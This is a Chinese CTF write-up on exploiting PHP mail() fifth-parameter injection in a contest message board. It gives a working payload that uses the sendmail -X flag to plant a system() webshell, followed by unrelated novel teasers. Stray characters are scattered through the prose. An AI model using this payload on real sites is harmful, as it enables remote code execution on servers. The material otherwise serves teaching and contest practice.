PHP mail函數(shù)漏洞利用（安恒杯1月賽經(jīng)典留言板）

利用mail函數(shù)可以使攻擊者達(dá)到遠(yuǎn)程代碼執(zhí)行權(quán)限以及其他惡意目的。

0x00獲取源碼

第一步訪問(wèn)/.index.php.swp源碼找到泄露的源碼蝙昙，主要功能代碼大致如下。

if(isset($_POST['submit'])){
    $email = isset($_POST['email'])?trim($_POST['email']):'';
    $title = isset($_POST['title'])?trim($_POST['title']):'';
    $content = isset($_POST['content'])?trim($_POST['content']):'';
    if(chkEmail($email) && chkTitle($title) && chkContent($content)){
        $to = 'ambulong@vulnspy.com';
        $subject = "收到來(lái)自 {$email} 的留言";
        $msg = "{$title}\n{$content}\nFrom: {$email}";
        $headers = 'From: ' . $email . "\r\n" .
            'Reply-To: ' . $email . "\r\n" .
            'X-Mailer: PHP/' . phpversion();
        $options = sprintf('-f%s', $email);
        if(mail($to, $subject, $msg, $headers, $options)){
            echo "發(fā)送成功";
        }else{
            echo "發(fā)送失敗";
        }
    }
    exit;
}

0x01mail函數(shù)分析

mail函數(shù)

mail函數(shù)用于從PHP應(yīng)用程序發(fā)送電子郵件，包括五個(gè)參數(shù)佳头。
bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )

其參數(shù)描述如下：

參數(shù)名	描述
to	郵件的接收者
subject	郵件的主題
message	發(fā)送的消息
headers	額外的報(bào)頭
parameters	程序的額外參數(shù)

其中第五個(gè)參數(shù)的描述為：

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.
This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.

通常间影，該參數(shù)被web應(yīng)用用來(lái)設(shè)置發(fā)送者的地址注竿，例如：-f miao@abc.com。mail函數(shù)會(huì)被系統(tǒng)中的 /usr/bin/sendmail 程序調(diào)用魂贬，該程序由郵件傳輸代理軟件安裝在系統(tǒng)上巩割，是用來(lái)發(fā)送郵件的接口。sendmail命令會(huì)在系統(tǒng)shell的幫助下執(zhí)行付燥。

攻擊向量

sendmail    的第五個(gè)參數(shù)可以通過(guò) *-O* 宣谈、*-X* 、*-C* 參數(shù)導(dǎo)致任意文件讀寫(xiě)键科。
-OQueueDirectory=/tmp    選擇一個(gè)可以寫(xiě)的目錄保存臨時(shí)文件
-X/tmp/log.txt  保存日志文件到任意目錄

其中-OQueueDirectory=/tmp可以簡(jiǎn)寫(xiě)為-oQ/tmp/闻丑；
-X參數(shù)也可以接受相對(duì)路徑漩怎，例如-X ./log.txt。

0x02漏洞利用

回到原題嗦嗡，觀察源碼中的這兩行勋锤，$options參數(shù)是用戶可控的，為-f拼接用戶填寫(xiě)的email字段侥祭。

        $options = sprintf('-f%s', $email);
        if(mail($to, $subject, $msg, $headers, $options)){...}

構(gòu)造POST參數(shù)如下（其中web根目錄是按照常理猜測(cè)的叁执，構(gòu)造相對(duì)路徑也可）:
email=miao@126.com -OQueueDirectory=/tmp -X/var/www/html/black.php
content=<?php system($_GET["black"]); ?>

然后訪問(wèn)/black.php?black=command，最后讀取flag.php文件矮冬。

參考：drops.blbana.cc徒恋；http://www.php.net/manual/en/function.mail.php；http://www.360zhijia.com/360anquanke/197210.html

最后編輯于：2018.01.22 17:05:49

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末欢伏，一起剝皮案震驚了整個(gè)濱河市入挣，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌硝拧，老刑警劉巖径筏，帶你破解...
沈念sama閱讀 222,729評(píng)論 6贊 517
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場(chǎng)離奇詭異障陶，居然都是意外死亡滋恬，警方通過(guò)查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 95,226評(píng)論 3贊 399
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門(mén)抱究，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)恢氯，“玉大人，你說(shuō)我怎么就攤上這事鼓寺⊙猓” “怎么了？”我有些...
開(kāi)封第一講書(shū)人閱讀 169,461評(píng)論 0贊 362
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵妈候，是天一觀的道長(zhǎng)敢靡。經(jīng)常有香客問(wèn)我，道長(zhǎng)苦银，這世上最難降的妖魔是什么啸胧？我笑而不...
開(kāi)封第一講書(shū)人閱讀 60,135評(píng)論 1贊 300
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮幔虏，結(jié)果婚禮上纺念，老公的妹妹穿的比我還像新娘。我一直安慰自己想括，他們只是感情好陷谱，可當(dāng)我...
茶點(diǎn)故事閱讀 69,130評(píng)論 6贊 398
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開(kāi)白布。她就那樣靜靜地躺著主胧，像睡著了一般叭首。火紅的嫁衣襯著肌膚如雪习勤。梳的紋絲不亂的頭發(fā)上，一...
開(kāi)封第一講書(shū)人閱讀 52,736評(píng)論 1贊 312
城市分裂傳說(shuō)
那天焙格，我揣著相機(jī)與錄音图毕，去河邊找鬼。笑死眷唉，一個(gè)胖子當(dāng)著我的面吹牛予颤，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播冬阳，決...
沈念sama閱讀 41,179評(píng)論 3贊 422
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開(kāi)眼蛤虐，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼！你這毒婦竟也來(lái)了肝陪？” 一聲冷哼從身側(cè)響起驳庭，我...
開(kāi)封第一講書(shū)人閱讀 40,124評(píng)論 0贊 277
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎氯窍，沒(méi)想到半個(gè)月后饲常，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 46,657評(píng)論 1贊 320
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡狼讨，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 38,723評(píng)論 3贊 342
?白月光啟示錄
正文我和宋清朗相戀三年贝淤，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片政供。...
茶點(diǎn)故事閱讀 40,872評(píng)論 1贊 353
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡播聪，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出布隔，到底是詐尸還是另有隱情离陶，我是刑警寧澤，帶...
沈念sama閱讀 36,533評(píng)論 5贊 351
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布执泰，位于F島的核電站枕磁，受9級(jí)特大地震影響渡蜻，放射性物質(zhì)發(fā)生泄漏术吝。R本人自食惡果不足惜，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 42,213評(píng)論 3贊 336
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一茸苇、第九天我趴在偏房一處隱蔽的房頂上張望排苍。院中可真熱鬧，春花似錦学密、人聲如沸淘衙。這莊子的主人今日做“春日...
開(kāi)封第一講書(shū)人閱讀 32,700評(píng)論 0贊 25
一樁弒父案腻暮，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)彤守。三九已至毯侦，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間具垫，已是汗流浹背侈离。一陣腳步聲響...
開(kāi)封第一講書(shū)人閱讀 33,819評(píng)論 1贊 274
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工，沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留筝蚕，地道東北人卦碾。一個(gè)月前我還...
沈念sama閱讀 49,304評(píng)論 3贊 379
代替公主和親
正文我出身青樓，卻偏偏與公主長(zhǎng)得像起宽，于是被迫代替她去往敵國(guó)和親洲胖。傳聞我的和親對(duì)象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 45,876評(píng)論 2贊 361

PHP mail函數(shù)漏洞利用（安恒杯1月賽 經(jīng)典留言板）